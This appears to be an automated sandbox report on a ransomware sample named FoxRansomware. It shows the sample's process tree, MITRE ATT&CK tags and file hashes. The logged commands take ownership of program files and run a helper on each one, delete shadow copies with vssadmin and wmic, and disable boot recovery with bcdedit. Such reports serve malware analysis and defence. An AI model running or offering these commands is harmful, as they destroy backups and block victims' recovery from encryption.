C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:3732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:4664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:1148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4132
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:4112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:4192
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:4400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:4392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4408
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:1812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:4228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:1668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:2132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:4196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:4908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:5012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:4780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "pmd.cer" -nobanner3⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "pmd.cer" -nobanner4⤵PID:3572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:5076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:2484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:2832
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:3248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:3876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵PID:4968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "pdf.gif" -nobanner3⤵PID:3396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "pdf.gif" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:4860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:3644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "server_issue.gif" -nobanner3⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "server_issue.gif" -nobanner4⤵PID:5072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:4564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:2820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:4136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:3688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:3260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵
- Modifies file permissions
PID:3136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:3440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:3872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:3180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "zx______.pfm" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "zx______.pfm" -nobanner4⤵PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:3244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:3544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:2452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:3620
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:3332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:2708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:3188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "can32.clx" -nobanner3⤵PID:2512
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "can32.clx" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:3580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:3500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "symbol.txt" -nobanner3⤵PID:108
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "symbol.txt" -nobanner4⤵PID:3728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:3824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:3468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵
- Modifies file permissions
PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:2672
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:1540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:2376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "behavior.xml" -nobanner3⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "behavior.xml" -nobanner4⤵PID:3152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:3356
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:2956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵PID:3116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1236
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:4940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:3740
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:3648
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {EDC881A6-AAFE-44A2-9516-9A7400B0967C} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]1⤵PID:1196
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\bXqnuShk.bat"2⤵PID:3856
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2540
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2016
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:5076
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:5088
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4920
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5c2536e415623fcacaf28c8053467ee45
SHA1e6f1c293f91a39b0d889190da4d25c72eb390f79
SHA2565c5e4dcc9b7265c6bbe9fdfe84ffaea34d08b2b4b3365e814d17e0ff17d77505
SHA512b8c33f7dc6adb43ad73ac5626971e9938c3bf5afd761d173c8db8604d3339337c26a307515c8b1cee856fe27a8161aebe4b8298f7a01fe9542c7f118c5cb5dc4
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
1.2MB
MD5268360527625d09e747d9f7ab1f84da5
SHA109772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA25642f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA51207fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
Filesize
226B
MD51b7f8654f5d54d9debdc7a38e89c9a83
SHA1015f4a914c7eecfa6d551aabcc88745929840373
SHA2563c6f7ce48d82dd30845b683d71191f530f50555f7c5b540f8ee18cfbea908ce4
SHA512f38e20f9696cd47e72970f858e25977ed612f485d1815bff4e835fed64e4b0d076e0b2006ca1f40f26461ce3dbb3a51e377f1e25c8f5cc213b224a4379c0870e
-
Filesize
63B
MD552f5aa57e5b8558a884da5cdbc8ec0d0
SHA10080c1d070dab076fef8b0c2f5eb7fcc52384abf
SHA256528291be38447fe8701ae00a1289875944c541979aec0bdff918127fe01b8652
SHA5128e1c4c0460dc61f8f157080fa75f22bfc849ce6812cba2efa733970e68c49ddcf819dad7b4115cb6656244c8c54fc695101afbf6d3d02cf641a5f13a1535c1ec
-
Filesize
139B
MD542f2f4972b16f53bf09ff7ec68a426de
SHA1dd1a36171e092ce998a4fe118e69011955ceb32c
SHA256b2bf412d8deb33b146136888dfed415c72c208c0c6ef797c784b890ce7071c1c
SHA5121f976d5af404bb5a9c238e54da15da6fb62106da3e009af18fd96f1328bb7d524fe3419ca442ebff0f0d06d4ddead5ea64097af4e0b65e5518993f077e1c4868
-
Filesize
1KB
MD5d283254a2c8cb62bedcaf2b353d85acc
SHA1506d618a4a33ee19d3e695a581206c43fa801278
SHA2564dd82f91ef7df08cf1be522685e279d815b8493bbea29be826aedfdeaebc0457
SHA5124d0a3baab31b3b1eddbab36d9ef5c51b90f6c91f010032b6e86110916242dd1b31324457f8b9b8196d339134a01c0228f8ddef8e542727b17a2ef6ba20ef64c3
-
Filesize
2KB
MD526c79a33929700d58351c63c5e72ee7f
SHA1ef5661060142387d8de4b615a6a5009f80ff740d
SHA256dbfd81037ca8a3ecfa23d73d32651213399fd1c7f01bb99f698f7dace4a3ae63
SHA512be5d0d02fe3869ce6e8a0c49b569fb86eb98added6a08a1af9e4c287cc5c641733cbaf42b37b0667601230cb7bb337bd2183c3125ef3b123bbce3cc1d5a7c90e
-
Filesize
3KB
MD5f3ae634c4b3df04fefbcfd127d0ad2b9
SHA12b0c35de038e068362c3ebdcd002213593212bd1
SHA256d1bf59ff6074d784ba45174a4ecb4111bfcbb500b9ce84cb2e6c3b12f9827e8c
SHA51250446dd644f2fe563a98eec9ee9f37b455b38ff7bf90cf7ff62a4660d11e91f8ad506822fdaa8e30fba21d19fa126cb2ff8de178b5d7c63398ed83065e168ed5
-
Filesize
3KB
MD5c61b8eca80bfc6fca5eac3f19abc9313
SHA1f9562f596b694791bdd7d58261005d01c3452b0c
SHA256c4e450beee16b016c263ca370f5e456833e5f5a3ed04ef03e61ab8c778a32b5e
SHA512f04d8c418262953bd0d3276493bf8aa7eeeed3cb3a3b1665e9a5d420755be06e3c466ddb1dd6b01ef0d2e04cdc47032c38c4882242b6c55d3917dfb26d8ae737
-
Filesize
3KB
MD531c83ad7f1b06b3de10400cffd5a6f14
SHA1404bfe5d878e4c4af9ba61513cb7f2e35711aa53
SHA2563e4d33888389d2b6f1bc0947e012620dece234f5c33fbcb3f82d856a3d510d6f
SHA5121add58e8a2e233b1a34757fa4385e25023c9a01acde65525b03469558d637c470341f2aec78ee5ccc07479862983d63a1e990d6ed336774fdeebff8b42bf1aee
-
Filesize
24KB
MD5643f115935d28b0f48640438b65e09e7
SHA1b146107604a62e08ad328ff6f9a1e3fc8237904d
SHA25682cad0fc57ec5db02843986c63bba5efaeb30b950e3aac68e79045f85935d18c
SHA512fccdddb4e36bdb997c82fbd9b2379c86d0a5146131727a0799c40cd7434c275e8fdc5992604341474e8a7310cb543a48a34496d4ed7801581961e8760acae0fa
-
Filesize
16B
MD517d432845dc7cb55ac69d75cf72f7f5d
SHA17f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA51225054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
260B
MD5a620cbd5340019ad7b7efb8d10546f9d
SHA1b792632aa20b136d1826a5b60c4cadbac1845bef
SHA256d8087589fed9277eedec852529dbcdcade423c494d0420bd7ed1b72e5ad1d0c9
SHA512d8bd3318542fdcfeba0f70f8457642062dad05fcee7f943444ced9a4699fd7511aa72517e8ec4db3b87bf6b6f2172749c956386de98d94376438b72fc73fb001
-
Filesize
265B
MD51354d52ed5413acf3b087c2cb440d426
SHA12ca437bfa9ae74040a1b601b2d8ef17aca248786
SHA2561b9ceed388d397be8cbed1abebc830af4663aa99990585d01d90ef5be92b5209
SHA512b9deb525567859b770e0d9e35c46072e744ea2e2994658ee9e95faaa11cef268fe0076ab10b37ae4de7d69da050dc564418cdf42eae100142b2bc816a5a2b0c9